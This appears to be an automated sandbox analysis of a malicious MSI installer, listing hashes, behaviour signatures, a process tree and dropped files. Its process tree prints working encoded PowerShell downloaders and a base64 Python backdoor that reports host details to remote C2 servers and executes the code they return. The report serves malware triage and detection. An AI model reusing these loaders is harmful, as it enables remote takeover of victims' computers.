Overview

overview

10

Static

static

1

nf.msi

windows7-x64

10

nf.msi

windows10-2004-x64

10

Analysis

  • max time kernel
    81s
  • max time network
    86s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-01-2024 15:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    nf.msi

  • Size

    1.1MB

  • MD5

    d6d8c76b6638f4519ef9479055078a20

  • SHA1

    be4471d3c684e1d91aca19f3f0b1cba6c7db6971

  • SHA256

    8501cc18076fb71b8d394512d1bf32fc7cc00ad77a2d8b47bc175a337cc3129b

  • SHA512

    8ec7b06a69a8c510544b79c644ac6ff875ea47419339bcc71e7da36761f81c6308f7a69341834447580fb4417f17765e897c1f396b1727f4a8add1bb4eb8a9c0

  • SSDEEP

    24576:FUiYKztdfG8NQGafAtbe/IEFXsaV5C7eYVLsTPRDKeU:FUiYefNQGoARRaV5C77yPROe

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://jucatyo6.autodesk360.com/shares/download/file/SHd38bfQT1fb47330c9911d55948da91b2ea/dXJuOmFkc2sud2lwcHJvZDpmcy5maWxlOnZmLnhsWHBlUVVCU2hhb1JVZlpvdE5uS1E_dmVyc2lvbj05

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 12 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 21 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\nf.msi
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4416
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4276
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 1EFE2B41217FF22D2B5D9BDFF804E5A1
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4360
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss3E5.ps1"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4584
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e CgAjADkANQA3ADEANQA2ADkANAA1AAoAJAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBqAHUAYwBhAHQAeQBvADYALgBhAHUAdABvAGQAZQBzAGsAMwA2ADAALgBjAG8AbQAvAHMAaABhAHIAZQBzAC8AZABvAHcAbgBsAG8AYQBkAC8AZgBpAGwAZQAvAFMASABkADMAOABiAGYAUQBUADEAZgBiADQANwAzADMAMABjADkAOQAxADEAZAA1ADUAOQA0ADgAZABhADkAMQBiADIAZQBhAC8AZABYAEoAdQBPAG0ARgBrAGMAMgBzAHUAZAAyAGwAdwBjAEgASgB2AFoARABwAG0AYwB5ADUAbQBhAFcAeABsAE8AbgBaAG0ATABuAGgAcwBXAEgAQgBsAFUAVgBWAEMAVQAyAGgAaABiADEASgBWAFoAbABwAHYAZABFADUAdQBTADEARQBfAGQAbQBWAHkAYwAyAGwAdgBiAGoAMAA1ACIACgAkAG8AdQB0ACAAPQAgACIAcwBlAHQAdQBwAC4AbQBzAGkAIgAKAGMAZAAgACQARQBOAFYAOgBwAHUAYgBsAGkAYwAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AdQByAGkAIAAkAHUAcgBpACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdAAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAbQBzAGkAZQB4AGUAYwAuAGUAeABlACIAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgAvAGkAIAAkAG8AdQB0ACAALwBRAE4AIgAKACMANAAxADMANgAzADgAOAA3ADcAOAA=
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4212
          • C:\Windows\SysWOW64\msiexec.exe
            "C:\Windows\system32\msiexec.exe" /i setup.msi /QN
            5⤵
            • Enumerates connected drives
            • Suspicious use of AdjustPrivilegeToken
            PID:4964
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 060F576CDAB33204B132DC742309E996
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1836
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss4AC2.ps1"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4588
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e CgAjACAAQgBsAG8AYwBrACAAZgBvAHIAIABkAGUAYwBsAGEAcgBpAG4AZwAgAHQAaABlACAAcwBjAHIAaQBwAHQAIABwAGEAcgBhAG0AZQB0AGUAcgBzAC4ACgBQAGEAcgBhAG0AKAApAAoACgBjAGQAIAAkAEUATgBWADoAcAB1AGIAbABpAGMACgAkAEYAbwBsAGQAZQByACAAPQAgACIAJAB7AEUATgBWADoAcAB1AGIAbABpAGMAfQBcAHAAZQBmAGkAbABlAC0AMgAwADIAMwAuADIALgA3ACIACgAkAEYAbwBsAGQAZQByADIAIAA9ACAAIgAkAHsARQBOAFYAOgBwAHUAYgBsAGkAYwB9AFwAcAB5AHQAaABvAG4AIgAKAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABGAG8AbABkAGUAcgAyACAALQBQAGEAdABoAFQAeQBwAGUAIABDAG8AbgB0AGEAaQBuAGUAcgApACkAIAB7AAoAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAUgBJACAAaAB0AHQAcABzADoALwAvAGYAaQBsAGUAcwAuAHAAeQB0AGgAbwBuAGgAbwBzAHQAZQBkAC4AbwByAGcALwBwAGEAYwBrAGEAZwBlAHMALwA3ADgALwBjADUALwAzAGIAMwBjADYAMgAyADIAMwBmADcAMgBlADIAMwA2ADAANwAzADcAZgBkADIAYQA1ADcAYwAzADAAZQA1AGIAMgBhAGQAZQBjAGQAOAA1AGUANwAwADIANwA2ADgANwA5ADYAMAA5AGEANwA0ADAAMwAzADMANAAvAHAAZQBmAGkAbABlAC0AMgAwADIAMwAuADIALgA3AC4AdABhAHIALgBnAHoAIAAtAE8AdQB0AEYAaQBsAGUAIABwAGUAZgBpAGwAZQAuAHQAYQByAC4AZwB6AAoAIAAgACAAIAB0AGEAcgAgAC0AeAB2AHoAZgAgAHAAZQBmAGkAbABlAC4AdABhAHIALgBnAHoAOwAKACAAIAAgACAAUgBlAG4AYQBtAGUALQBJAHQAZQBtACAAJABGAG8AbABkAGUAcgAgACIAcAB5AHQAaABvAG4AIgAKACAAIAAgACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAFIASQAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHAAeQB0AGgAbwBuAC4AbwByAGcALwBmAHQAcAAvAHAAeQB0AGgAbwBuAC8AMwAuADkALgA2AC8AcAB5AHQAaABvAG4ALQAzAC4AOQAuADYALQBlAG0AYgBlAGQALQB3AGkAbgAzADIALgB6AGkAcAAgAC0ATwB1AHQARgBpAGwAZQAgAHAAeQB0AGgAbwBuAC4AegBpAHAAOwAKACAAIAAgACAARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAAcAB5AHQAaABvAG4ALgB6AGkAcAAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIABwAHkAdABoAG8AbgA7AAoAfQAKAC4AXABwAHkAdABoAG8AbgBcAHAAeQB0AGgAbwBuAC4AZQB4AGUAIAAtAGMAIAAiACIAIgBpAG0AcABvAHIAdAAgAGIAYQBzAGUANgA0ADsAIABlAHgAZQBjACgAYgBhAHMAZQA2ADQALgBiADYANABkAGUAYwBvAGQAZQAoACcAYgBTAEEAOQBJAEMAYwAwAE0AVABJADAATQBUAGcAMQBOAGoAZwAxAE4AegBBAG4AQwBtAFoAeQBiADIAMABnAGQARwBsAHQAWgBTAEIAcABiAFgAQgB2AGMAbgBRAGcAYwAyAHgAbABaAFgAQQBLAGMAMgB4AGwAWgBYAEEAbwBOAGoAQQBwAEMAbQBsAHQAYwBHADkAeQBkAEMAQgBpAFkAWABOAGwATgBqAFEAZwBZAFgATQBnAFkAZwBwAHAAYgBYAEIAdgBjAG4AUQBnAGMAMgA5AGoAYQAyAFYAMABJAEcARgB6AEkASABOAHoAQwBtAFoAeQBiADIAMABnAGMAbQBGAHUAWgBHADkAdABJAEcAbAB0AGMARwA5AHkAZABDAEIAagBhAEcAOQBwAFkAMgBVAEsAYQBXADEAdwBiADMASgAwAEkASABkAHAAYgBuAEoAbABaAHkAQgBoAGMAeQBCADMAQwBtAFIAbABaAGkAQgB3AEsARwBNAHMASQBHADQAcABPAGcAbwBnAEkAQwBBAGcAYwB6AEkAZwBQAFMAQgAzAEwAawA5AHcAWgBXADUATABaAFgAawBvAGQAeQA1AEkAUwAwAFYAWgBYADAAeABQAFEAMABGAE0AWAAwADEAQgBRADAAaABKAFQAawBVAHMASQBHAE0AcABDAGkAQQBnAEkAQwBCAHkAWgBYAFIAMQBjAG0ANABnAGQAeQA1AFIAZABXAFYAeQBlAFYAWgBoAGIASABWAGwAUgBYAGcAbwBjAHoASQBzAEkARwA0AHAAVwB6AEIAZABDAG4AQgB5AEkARAAwAGcAYwBDAGgAeQBKADAAaABCAFUAawBSAFgAUQBWAEoARgBYAEYAeABFAFIAVgBOAEQAVQBrAGwAUQBWAEUAbABQAFQAbAB4AGMAVQAzAGwAegBkAEcAVgB0AFgARgB4AEQAWgBXADUAMABjAG0ARgBzAFUASABKAHYAWQAyAFYAegBjADIAOQB5AFgARgB3AHcASgB5AHcAZwBKADEAQgB5AGIAMgBOAGwAYwAzAE4AdgBjAGsANQBoAGIAVwBWAFQAZABIAEoAcABiAG0AYwBuAEsAUQBwADIAYwB5AEEAOQBJAEgAQQBvAGMAaQBkAFQAVAAwAFoAVQBWADAARgBTAFIAVgB4AGMAVABXAGwAagBjAG0AOQB6AGIAMgBaADAAWABGAHgAWABhAFcANQBrAGIAMwBkAHoASQBFADUAVQBYAEYAeABEAGQAWABKAHkAWgBXADUAMABWAG0AVgB5AGMAMgBsAHYAYgBpAGMAcwBJAEMAZABRAGMAbQA5AGsAZABXAE4AMABUAG0ARgB0AFoAUwBjAHAAQwBtAFoAegBJAEQAMABnAEoAeQA1AGkAYwBtAEYANgBhAFcAeAB6AGIAMwBWADAAYQBDADUAagBiAEcAOQAxAFoARwBGAHcAYwBDADUAaABlAG4AVgB5AFoAUwA1AGoAYgAyADAAbgBDAG0AeABzAEkARAAwAGcAVwAyAFkAbgBhADIAWQAwAFoAbQBvADUATQBuAHAAbQBhADIAbwA1AE0AbgB0AG0AYwAzADAAbgBMAEMAQgBtAEoAMgBaAHIAYQBqAGsANQBNADMAbABtAE0AegBrAHoATQAzAHQAbQBjADMAMABuAEwAQwBCAG0ASgAyAGQAbgBOAEQAawA0AGEAbQBoAG8ATQBuAGcANQBOAEQATQAwAGUAMgBaAHoAZgBTAGMAcwBJAEcAWQBuAGEARwBnADEATwBEAE0ANQBNAEQAQQAwAGEAbQBoADcAWgBuAE4AOQBKAHkAdwBnAFoAaQBkAHAAWQBuAE0AeABNAFgAaAByAFoARABnADUATgBEAE4ANwBaAG4ATgA5AEoAeQB3AGcAWgBpAGQAegBhADIAWgBxAE0AagBSADEAZABUAEkANQBaAG0AUgByAGEAagBSAHIAYQBuAHQAbQBjADMAMABuAFgAUQBwAGwAWgBTAEEAOQBJAEUAWgBoAGIASABOAGwAQwBuAGQAbwBhAFcAeABsAEkARgBSAHkAZABXAFUANgBDAGkAQQBnAEkAQwBCAHAAWgBpAEEAbgBRAG4ASgB2AFkAVwBSADMAWgBXAHgAcwBKAHkAQgBwAGIAaQBCAHcAYwBqAG8ASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAaQBjAG0AVgBoAGEAdwBvAGcASQBDAEEAZwBaAG0AOQB5AEkARwB3AGcAYQBXADQAZwBiAEcAdwA2AEMAaQBBAGcASQBDAEEAZwBJAEMAQQBnAGQASABKADUATwBnAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQgAzAGEAWABSAG8ASQBIAE4AegBMAG4ATgB2AFkAMgB0AGwAZABDAGgAegBjAHkANQBCAFIAbAA5AEoAVABrAFYAVQBMAEMAQgB6AGMAeQA1AFQAVAAwAE4ATABYADEATgBVAFUAawBWAEIAVABTAGsAZwBZAFgATQBnAGMAegBvAEsASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkASABNAHUAWQAyADkAdQBiAG0AVgBqAGQAQwBnAG8AWgBpAGQANwBiAEgAMABuAEwAQwBCAGoAYQBHADkAcABZADIAVQBvAFcAegBNADQATQBqAEUAcwBJAEQAUQAwAE0AVABnAHMASQBEAFUAeABOAHoAZwBzAEkARABrADUATwBEAE0AcwBJAEQAYwB6AE0AVABFAHMASQBEAGcAeQBPAFQAUQBzAEkARABZAHkATgB6AE0AcwBJAEQASQB4AE0AVABrAHMASQBEAEUAdwBNAFQAZwBzAEkARABFADMATQBEAEYAZABLAFMAawBwAEMAaQBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB6AEwAbgBOAGwAYgBtAFEAbwBaAGkAZAB3AGUAVQBOAHYAWgBHAFUAZwBMAFMAQgA3AGMAMwBNAHUAWgAyAFYAMABhAEcAOQB6AGQARwA1AGgAYgBXAFUAbwBLAFgAMABnAGYAQwBCADcAZABuAE4AOQBJAEgAdwBnAGUAMwBCAHkAZgBTAGMAdQBaAFcANQBqAGIAMgBSAGwASwBDAGsAcABDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAawBkAEMAQQA5AEkASABNAHUAYwBtAFYAagBkAGkAZwAyAE4AVABVAHoATgBpAGsAdQBaAEcAVgBqAGIAMgBSAGwASwBDAGsASwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBHAFYANABaAFcATQBvAFkAaQA1AGkATgBqAFIAawBaAFcATgB2AFoARwBVAG8AYwAzAFIAeQBLAEcAUgAwAEsAUwBrAHAAQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBCAHoATABtAE4AcwBiADMATgBsAEsAQwBrAEsASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkARwBWAGwASQBEADAAZwBWAEgASgAxAFoAUQBvAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAFkAbgBKAGwAWQBXAHMASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAbABlAEcATgBsAGMASABRADYAQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEgAQgBoAGMAMwBNAEsASQBDAEEAZwBJAEcAeABzAEwAbQBGAHcAYwBHAFYAdQBaAEMAZwBuAFkAMgBGAHQAWgBYAEoAaABMAFcAVgB0AGMASABKAGwAYwAyAEUAdQBZAFcATgBqAFoAWABOAHoAWQAyAEYAdABMAG0AOQB5AFoAeQBjAHAAQwBpAEEAZwBJAEMAQgBwAFoAaQBCAGwAWgBUAG8ASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAaQBjAG0AVgBoAGEAdwA9AD0AJwApACkAOwAgAGUAeABpAHQAKAApACIAIgAiADsACgA=
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2304
          • C:\Windows\SysWOW64\tar.exe
            "C:\Windows\system32\tar.exe" -xvzf pefile.tar.gz
            5⤵
              PID:4312
            • C:\Users\Public\python\python.exe
              "C:\Users\Public\python\python.exe" -c "import base64; exec(base64.b64decode('bSA9ICc0MTI0MTg1Njg1NzAnCmZyb20gdGltZSBpbXBvcnQgc2xlZXAKc2xlZXAoNjApCmltcG9ydCBiYXNlNjQgYXMgYgppbXBvcnQgc29ja2V0IGFzIHNzCmZyb20gcmFuZG9tIGltcG9ydCBjaG9pY2UKaW1wb3J0IHdpbnJlZyBhcyB3CmRlZiBwKGMsIG4pOgogICAgczIgPSB3Lk9wZW5LZXkody5IS0VZX0xPQ0FMX01BQ0hJTkUsIGMpCiAgICByZXR1cm4gdy5RdWVyeVZhbHVlRXgoczIsIG4pWzBdCnByID0gcChyJ0hBUkRXQVJFXFxERVNDUklQVElPTlxcU3lzdGVtXFxDZW50cmFsUHJvY2Vzc29yXFwwJywgJ1Byb2Nlc3Nvck5hbWVTdHJpbmcnKQp2cyA9IHAocidTT0ZUV0FSRVxcTWljcm9zb2Z0XFxXaW5kb3dzIE5UXFxDdXJyZW50VmVyc2lvbicsICdQcm9kdWN0TmFtZScpCmZzID0gJy5icmF6aWxzb3V0aC5jbG91ZGFwcC5henVyZS5jb20nCmxsID0gW2Yna2Y0Zmo5Mnpma2o5Mntmc30nLCBmJ2Zrajk5M3lmMzkzM3tmc30nLCBmJ2dnNDk4amhoMng5NDM0e2ZzfScsIGYnaGg1ODM5MDA0amh7ZnN9JywgZidpYnMxMXhrZDg5NDN7ZnN9JywgZidza2ZqMjR1dTI5ZmRrajRrantmc30nXQplZSA9IEZhbHNlCndoaWxlIFRydWU6CiAgICBpZiAnQnJvYWR3ZWxsJyBpbiBwcjoKICAgICAgICBicmVhawogICAgZm9yIGwgaW4gbGw6CiAgICAgICAgdHJ5OgogICAgICAgICAgICB3aXRoIHNzLnNvY2tldChzcy5BRl9JTkVULCBzcy5TT0NLX1NUUkVBTSkgYXMgczoKICAgICAgICAgICAgICAgIHMuY29ubmVjdCgoZid7bH0nLCBjaG9pY2UoWzM4MjEsIDQ0MTgsIDUxNzgsIDk5ODMsIDczMTEsIDgyOTQsIDYyNzMsIDIxMTksIDEwMTgsIDE3MDFdKSkpCiAgICAgICAgICAgICAgICBzLnNlbmQoZidweUNvZGUgLSB7c3MuZ2V0aG9zdG5hbWUoKX0gfCB7dnN9IHwge3ByfScuZW5jb2RlKCkpCiAgICAgICAgICAgICAgICBkdCA9IHMucmVjdig2NTUzNikuZGVjb2RlKCkKICAgICAgICAgICAgICAgIGV4ZWMoYi5iNjRkZWNvZGUoc3RyKGR0KSkpCiAgICAgICAgICAgICAgICBzLmNsb3NlKCkKICAgICAgICAgICAgICAgIGVlID0gVHJ1ZQogICAgICAgICAgICAgICAgYnJlYWsKICAgICAgICBleGNlcHQ6CiAgICAgICAgICAgIHBhc3MKICAgIGxsLmFwcGVuZCgnY2FtZXJhLWVtcHJlc2EuYWNjZXNzY2FtLm9yZycpCiAgICBpZiBlZToKICAgICAgICBicmVhaw==')); exit()"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:2004

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Config.Msi\e57f3c9.rbs
      Filesize

      988B

      MD5

      766be2d3bf2e7a2c3639eb29125f2eaa

      SHA1

      90720bcf75b47bdc805b4c0bbcef8913460d9fac

      SHA256

      be5b049c04ce7f5441add0ed8193a2987f6313605e054dd0fc52dc7c1bc7351e

      SHA512

      d49e3c9779f102e4c0d0c0ac7784e993ffd208d6767fdf1bd1271f3d7428e4080555e099be0dbe44ec5cf2d53020e6fae96fa4512af5bd0d2d3f3632cc02ae22

      Download Submit

    • C:\Config.Msi\e57f3cd.rbs
      Filesize

      987B

      MD5

      90fbb2ce4717b714fce507391581bbe7

      SHA1

      580b25baf965d68caebd9381fe0d56b0bc79dff5

      SHA256

      ac537f73033b92ba7cc3fd41b44787c7c30333c6feb40ad48a6da1559abb3668

      SHA512

      ce8fbc342c831768194230b148896b201c53437967d0b02699426748f64f7fa0a067ff3335f7e339be324cd5627cea58f6a555dd221e55e58814ff88cccf539f

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      0774a05ce5ee4c1af7097353c9296c62

      SHA1

      658ff96b111c21c39d7ad5f510fb72f9762114bb

      SHA256

      d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4

      SHA512

      104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      13KB

      MD5

      e16dadd8b702cda80a61a1e480dd8d32

      SHA1

      552e986ad5ab1eb48a77e480cf961f1651b281c8

      SHA256

      2debd24a07d5bd9b1cdf0b0625200f406c9842babb24bdc07f4f61a687ebde56

      SHA512

      b56dbba237a42a60abeab85e0697dfdb0508ef714d1288ab79ce5ce9884631f7291b28c914e619f9f953b70042a4be1cd0747753d99e4c5e14938e07826fb8a8

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      6KB

      MD5

      23934dd89ac4cc00bffd130051f34ea5

      SHA1

      23f855fa1db699cfd1717ebc00f392f382c16a5e

      SHA256

      0c5c7ea36fc359499197a1d95888c23781ab51222ff2696ce0e82f4e29ff93c4

      SHA512

      07483fa5df83ece33f2a379cd8d11bef4f5ea65741e08909bd95df7428e22d9af01d679fe4a95a564af066c8d9b90ced277c7ae2dd0cfbe53b519af4664a4dde

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\MSI7ed00.LOG
      Filesize

      20KB

      MD5

      3ba7a9f5c6ddeecdcf2335768632e51d

      SHA1

      8c2b87b7df07d2abe3f1773fbc19fa816ffb1879

      SHA256

      4615d5f08ee1e1fab9646bab715da42940ff49e34c6a5e44ddbc276faf005bca

      SHA512

      e21a47439d86ce4eecd5999a127afd5559bd01d3dedd77da0f50d3d79c397a089638667c54acbfb9c3e806e7a442cd2f23c6cf864b6044fd2e4157775edf207e

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\MSI83e2d.LOG
      Filesize

      1KB

      MD5

      f1ca14af8061acd3d9e7e07d72d15493

      SHA1

      31e1cd9c3f172da433a425658d811bc42f6db0c5

      SHA256

      0e8a202fc4500ed579ed8f660dc00266e1d02f742b58674cc1bae3706d396a62

      SHA512

      cc9fc9a878f1cee85edefda8feb312ff6efc458a3dec7a89b47b076efcd8f3497559bf0b94c9a642f0cdf19b6e937ac967e4fce6193476e022f3b95aacd6042a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1vvv25lp.xkr.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\pss3D4.ps1
      Filesize

      1KB

      MD5

      534146415925c27f916e8d61df1a7447

      SHA1

      6ee383a8cac3a2f12ee264e0d5110b5729c3473d

      SHA256

      a7f50044c017dba8c793e3561ad36a92dae6300c20218e1f8a0c49cb402a17b2

      SHA512

      2e0d328ff3817d5ce47c096187a28535948caef09f25aa35be392ecf0cbab913aa274d560ef92a49bc6b4c7d3d3303b93b46aabfbcdc5c10278c37d7b5673ec2

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\pss3E5.ps1
      Filesize

      5KB

      MD5

      0d3b9d35e3fa5cd094501df3a81dca51

      SHA1

      37d05eb92faf6d6963806c849d1702abbd9c74de

      SHA256

      f42d6d84e51f27829e05838ce0db5a04e7d300dc9784cb6a18c6602487396705

      SHA512

      454eb6a6038d89f6d2e2b42953d40f449ea56d30a4589a0c4ea2b0753e5ca2742e20bca46700f623b40771fe8f421256782cefad6c77145ab517c4aece9b3469

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\pss4AC1.ps1
      Filesize

      11KB

      MD5

      0b28a7441b8d4ff633cbc895a36e6158

      SHA1

      a4a74d76008bbb40b69fead1a63f9a5b3cd20c4e

      SHA256

      48722fa5b4613e2f7a0c9535c9d1401cdfde731bb51c78219a199600aa2f0a3c

      SHA512

      064247d610b3a3f76b9b821ce79a74533154fbc717c0e3473f598863bd9358404d983a22fd4a2131022fb0f86da588704cafece1969867407ad59771823a6a1c

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\pss4AC2.ps1
      Filesize

      5KB

      MD5

      62fefe0f074a012ac25aff3b37eb5628

      SHA1

      ebf27bc763c9ad61af613b1c9be24229c22bbb1f

      SHA256

      3cbfb3d3ea7097961ba3494cd9da289802bf7d235a47358f7da01e17a42ccf0e

      SHA512

      4c1d97ae22c119d312abf7fcf0bb03316b5e4f27096957ee3540e9ced838fd5c369948880e16a3a0643109ff4b17b52ce316489ccd5a72ec2f30be4d6dd1389b

      Download Submit

    • C:\Users\Public\pefile.tar.gz
      Filesize

      73KB

      MD5

      fa0eba7c91f4e696771ddbfacdca25e4

      SHA1

      74b4c668e643f7cb8beb8128f5485fe709bef142

      SHA256

      82e6114004b3d6911c77c3953e3838654b04511b8b66e8583db70c65998017dc

      SHA512

      56cbfff3e6ffd07262d8a999358f2ddf2f6df7fff96ee647f94c57e791b278c9f9863aac92d0416fc3f7f2221652f8000a25d5f8f3233684b6bcec106df72fb4

      Download Submit

    • C:\Users\Public\python\python.exe
      Filesize

      96KB

      MD5

      5acd2c21e08a164bcb87ce78f1ad6bf4

      SHA1

      9643c9cfd7094c669cf8f61dc01af84659de452b

      SHA256

      0dd77d2e5c885bd9c9c9246ac79a01144555bdb5de84cbceba0a0f96d354cbf0

      SHA512

      03f5f3aaff4490302e8335f3b28d3474914804f54bf1d224aeaed8ff24607b503f864ce649b4396c5b2623f11d127ad4149b63f4473beb09e437e017e9d31b6e

      Download Submit

    • C:\Users\Public\python\python39._pth
      Filesize

      79B

      MD5

      203e517dd5374413eb47c8828084c676

      SHA1

      472e8498a5a730706f0bbd70962fc648f658b792

      SHA256

      d78f948f90e063c560c1535a132c3be33ad1014404a4ab25d30dc5849500cd47

      SHA512

      c112c6e63d67fb6cb4dafcb4f2455cb8fedf47d09554251b70c171e465e5212e6a8d1acbc383ed896b3c54fd02005b87c48a284dc632315e37218078113d574b

      Download Submit

    • C:\Users\Public\python\python39.dll
      Filesize

      4.3MB

      MD5

      6ea7584918af755ba948a64654a0a61a

      SHA1

      aa6bfb6f97c37d79e5499b54dc24f753b47f6de0

      SHA256

      3007a651d8d704fc73428899aec8788b8c8c7b150067e31b35bf5a3bd913f9b6

      SHA512

      d00e244b7fccdbec67e6b147827c82023dd9cb28a14670d13461462f0fbbe9e3c5b422a5207a3d08484eb2e05986386729a4973023519eb453ee4467f59d4a80

      Download Submit

    • C:\Users\Public\python\python39.zip
      Filesize

      2.4MB

      MD5

      154158aadf390cd6cb583abe48956fd3

      SHA1

      66ddd5f19b98ee894a049dc8b34368192d0978eb

      SHA256

      e76534d6af4fe820e64105513a1f3cf886aa837dbecd4ceefaae656a27fbb81d

      SHA512

      8ba968a8d559ba5265a132eac4f2e3c097fef8a08cb7aae2f8e93d123807ce60786056856b40c9cb55cb3766e87dea7fcb9464954c2aafd17b16716454dacd9a

      Download Submit

    • C:\Users\Public\python\vcruntime140.dll
      Filesize

      74KB

      MD5

      b8ae902fe1909c0c725ba669074292e2

      SHA1

      46524eff65947cbef0e08f97c98a7b750d6077f3

      SHA256

      657ab198c4035ec4b6ff6cf863c2ec99962593547af41b772593715de2df459c

      SHA512

      4a70740da0d5cdbd6b3c3869bcf6141cb32c929cb73728bd2044dd16896a3a1cafa28b0714fadcdb265172b62fa113095d379f3a7c16a248e86c8f7f89ecd0f4

      Download Submit

    • C:\Users\Public\setup.msi
      Filesize

      1.1MB

      MD5

      177233c88c71a12b6dd192ad1cda735f

      SHA1

      fa36613e47fe2bf72657767ba87f9ab6a86bc9ca

      SHA256

